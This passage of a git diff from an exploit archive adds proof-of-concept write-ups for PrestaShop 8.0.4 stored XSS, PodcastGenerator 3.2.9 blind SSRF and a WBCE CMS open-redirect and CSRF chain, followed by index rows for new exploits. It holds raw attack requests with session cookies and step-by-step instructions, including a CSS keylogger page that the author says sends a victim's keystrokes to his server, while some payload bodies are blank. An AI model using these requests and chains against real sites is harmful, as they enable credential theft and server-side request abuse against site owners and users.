+Application: prestashop +Version: 8.0.4 +Bugs: Stored XSS +Technology: PHP +Vendor URL: https://prestashop.com/ +Software Link: https://prestashop.com/prestashop-edition-basic/ +Date of found: 30.06.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1. Go to Catalog => Products +2. Select arbitary product +2. upload malicious svg file + +svg file content ===> + + + + + + + + + + +poc request: + +POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1 +Host: localhost +Content-Length: 756 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ +Accept: application/json +Cache-Control: no-cache +X-Requested-With: XMLHttpRequest +sec-ch-ua-platform: "" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55 +Connection: close + +------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ +Content-Disposition: form-data; name="path" + + +------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ +Content-Disposition: form-data; name="path_thumb" + + +------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ +Content-Disposition: form-data; name="file"; filename="malas.svg" +Content-Type: image/svg+xml + + + + + + + + + +------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ-- \ No newline at end of file diff --git a/exploits/php/webapps/51565.txt b/exploits/php/webapps/51565.txt new file mode 100644 index 000000000..dc3c34a5e --- /dev/null +++ b/exploits/php/webapps/51565.txt @@ -0,0 +1,118 @@ +#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection +#Application: PodcastGenerator +#Version: v3.2.9 +#Bugs: Blind SSRF via XML Injection +#Technology: PHP +#Vendor URL: https://podcastgenerator.net/ +#Software Link: https://github.com/PodcastGenerator/PodcastGenerator +#Date of found: 01-07-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + +2. Technical Details & POC +======================================== +steps: +1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php) +2. Fill all section and Short Description section set as 'test]]>( example :Attacker domain)http://localhost:3132http://localhost:3132http://localhost:3132 + + + Login + + + + + +

+ Password:: + + + +''' + +4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url. +5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php) + + +POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1 +Host: localhost +Content-Length: 160 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg +Connection: close + +url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login + +6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com. +7.We write to html files url + +url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html + +8.And create csrf-poc with csrf.poc.generator + + + + This CSRF was found by miri + + +

+ CSRF POC +

+
+ +
+ + + + + +9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim. + + +Poc video : https://youtu.be/m-x_rYXTP9E \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9764b7615..9abcb8f4d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3216,6 +3216,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 24866,exploits/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,dos,hardware,,2013-03-22,2013-03-22,0,OSVDB-91581,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php 38483,exploits/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,dos,hardware,,2013-04-19,2015-10-18,1,,,,,,https://www.securityfocus.com/bid/59325/info 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,,2018-07-20,2018-07-20,0,CVE-2018-14336,,,,, +51561,exploits/hardware/dos/51561.py,"TP-Link TL-WR940N V4 - Buffer OverFlow",2023-07-03,"Amirhossein Bahramizadeh",dos,hardware,,2023-07-03,2023-07-03,0,CVE-2023-36355,,,,, 45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80,2018-08-08,2018-08-08,0,,"Denial of Service (DoS)",,,, 45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80,2018-08-16,2018-08-17,0,CVE-2018-15172,"Denial of Service (DoS)",,,, 26802,exploits/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,dos,hardware,,2013-07-13,2013-07-13,0,CVE-2013-2784;OSVDB-94940,,,,, @@ -4179,6 +4180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 26664,exploits/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,webapps,hardware,,2013-07-07,2013-07-07,0,OSVDB-94924,,,,,http://www.s3cur1ty.de/advisories 34206,exploits/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,webapps,hardware,80,2014-07-30,2014-07-30,0,OSVDB-109787;OSVDB-109786;OSVDB-109785,,,,, 45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware,,2018-11-12,2018-11-13,0,,"Server-Side Request Forgery (SSRF)",,,, +51556,exploits/hardware/webapps/51556.txt,"D-Link DAP-1325 - Broken Access Control",2023-07-03,ieduardogoncalves,webapps,hardware,,2023-07-03,2023-07-03,0,,,,,, 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,"Cross-Site Scripting (XSS)",,,, 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,Traversal,,,, 24442,exploits/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",webapps,hardware,,2013-01-31,2013-01-31,0,OSVDB-89697,,,,, @@ -5381,6 +5383,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43008,exploits/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,remote,java,,2017-10-17,2017-10-17,1,CVE-2017-12617,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cfaa34d2a4b688780cd21fa3a48deaa56698c52e/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb 35211,exploits/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,remote,java,8001,2014-11-10,2014-11-10,1,CVE-2014-8516;OSVDB-114127,"Metasploit Framework (MSF)",,,, 30514,exploits/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,webapps,java,,2007-08-21,2013-12-26,1,CVE-2007-4479;OSVDB-37097,,,,,https://www.securityfocus.com/bid/25391/info +51564,exploits/java/webapps/51564.txt,"Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)",2023-07-03,tmrswrr,webapps,java,,2023-07-03,2023-07-03,0,,,,,, 29918,exploits/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,webapps,java,,2013-12-01,2013-12-01,0,OSVDB-100486,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php 50692,exploits/java/webapps/50692.txt,"Ametys CMS v4.4.1 - Cross Site Scripting (XSS)",2022-02-02,Vulnerability-Lab,webapps,java,,2022-02-02,2022-02-02,0,,,,,, 44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000,2018-03-07,2018-03-07,0,CVE-2018-7739,,,,, @@ -11018,6 +11021,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,, 40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,, +51555,exploits/multiple/remote/51555.txt,"Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)",2023-07-03,nu11secur1ty,remote,multiple,,2023-07-03,2023-07-03,0,CVE-2023-33137,,,,, +51552,exploits/multiple/remote/51552.txt,"Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)",2023-07-03,nu11secur1ty,remote,multiple,,2023-07-03,2023-07-03,0,CVE-2023-28285,,,,, 51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,, 19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info 19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950 @@ -11784,6 +11789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info 9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,, 43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7 +51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,, 51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,, 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,, 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,, @@ -19292,6 +19298,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,,2020-10-23,2020-10-23,0,,,,,, 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,,2020-05-22,2020-05-22,0,,,,,, 9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php,,2009-09-10,,1,OSVDB-58360;CVE-2009-3349;OSVDB-58359;CVE-2009-3348,,,,, +51559,exploits/php/webapps/51559.txt,"GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,, 32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php,,2008-10-28,2014-03-26,1,CVE-2008-5064;OSVDB-49439,,,,,https://www.securityfocus.com/bid/31963/info 28815,exploits/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,webapps,php,,2006-10-14,2016-09-02,1,,,,,,https://www.securityfocus.com/bid/20532/info 32449,exploits/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,webapps,php,,2008-10-01,2014-03-23,1,CVE-2008-4447;OSVDB-48857,,,,,https://www.securityfocus.com/bid/31524/info @@ -27782,6 +27789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip, 16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html 49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip, +51565,exploits/php/webapps/51565.txt,"PodcastGenerator 3.2.9 - Blind SSRF via XML Injection",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, 51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,, 26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,, 11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,, @@ -27852,6 +27860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21279,exploits/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,webapps,php,,2002-02-04,2012-09-12,1,OSVDB-87416,,,,,https://www.securityfocus.com/bid/4041/info 28946,exploits/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20974/info 27946,exploits/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,webapps,php,,2006-06-02,2013-08-30,1,,,,,,https://www.securityfocus.com/bid/18227/info +51551,exploits/php/webapps/51551.txt,"POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)",2023-07-03,yuyudhn,webapps,php,,2023-07-03,2023-07-03,0,CVE-2023-36348,,,,, 17959,exploits/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,webapps,php,,2011-10-10,2011-10-10,0,OSVDB-76292;OSVDB-76288;OSVDB-76287,,,,, 39108,exploits/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",webapps,php,,2014-02-26,2015-12-26,1,CVE-2014-2211;OSVDB-103769,,,,,https://www.securityfocus.com/bid/65817/info 18320,exploits/php/webapps/18320.txt,"Posse Softball Director CMS - 'team.php' Blind SQL Injection",2012-01-04,"Easy Laster",webapps,php,,2012-01-04,2012-01-04,1,OSVDB-82483;CVE-2012-5291,,,,, @@ -28048,6 +28057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,, 49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,, 49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,, +51563,exploits/php/webapps/51563.txt,"Prestashop 8.0.4 - Cross-Site Scripting (XSS)",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, 51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,, 45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation @@ -28784,6 +28794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,, 51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,, +51548,exploits/php/webapps/51548.txt,"Rukovoditel 3.4.1 - Multiple Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip, 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip, @@ -28886,6 +28897,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php,,2008-11-27,2017-01-04,1,OSVDB-57400;CVE-2008-7077,,,,, 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,,2020-12-23,2020-12-23,0,,,,,, 46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80,2019-05-14,2019-06-10,0,,"SQL Injection (SQLi)",,,, +51549,exploits/php/webapps/51549.py,"Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)",2023-07-03,"Amirhossein Bahramizadeh",webapps,php,,2023-07-03,2023-07-03,0,CVE-2023-36346,,,,, 51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-19,1,CVE-2023-3184,,,,, 50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",2022-01-13,"Betul Denizler",webapps,php,,2022-01-13,2022-01-13,0,,,,,, 37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php,,2012-08-18,2015-07-19,1,,,,,,https://www.securityfocus.com/bid/55117/info @@ -29974,6 +29986,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80,2016-10-20,2016-10-20,1,CVE-2016-7998,,,,http://www.exploit-db.comSPIP-v3.1.2.zip, 9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php,,2009-08-17,,1,CVE-2009-3041;OSVDB-57510,,,,, 33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80,2014-05-19,2014-05-21,0,CVE-2013-2118;OSVDB-93683,,,,http://www.exploit-db.comSPIP-v3.0.8.zip, +51557,exploits/php/webapps/51557.txt,"spip v4.1.10 - Spoofing Admin account",2023-07-03,nu11secur1ty,webapps,php,,2023-07-03,2023-07-03,0,,,,,, 51536,exploits/php/webapps/51536.py,"SPIP v4.2.0 - Remote Code Execution (Unauthenticated)",2023-06-20,nuts7,webapps,php,,2023-06-20,2023-06-21,1,CVE-2023-27372,,,,, 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,, 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info @@ -30681,6 +30694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17239,exploits/php/webapps/17239.txt,"Time and Expense Management System - Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",webapps,php,,2011-05-03,2011-05-03,0,OSVDB-72105;OSVDB-72106;OSVDB-72107,,,,http://www.exploit-db.comtems.zip, 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comtems.zip, 45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comtems.zip, +51558,exploits/php/webapps/51558.txt,"Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,, 11516,exploits/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,OSVDB-62478;CVE-2010-0707,,,,http://www.exploit-db.comtimeclock-software.zip, 39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80,2016-02-03,2020-10-14,0,,,,,, 48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,,2020-10-14,2020-10-14,0,,,,,, @@ -31279,6 +31293,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7061,exploits/php/webapps/7061.txt,"V3 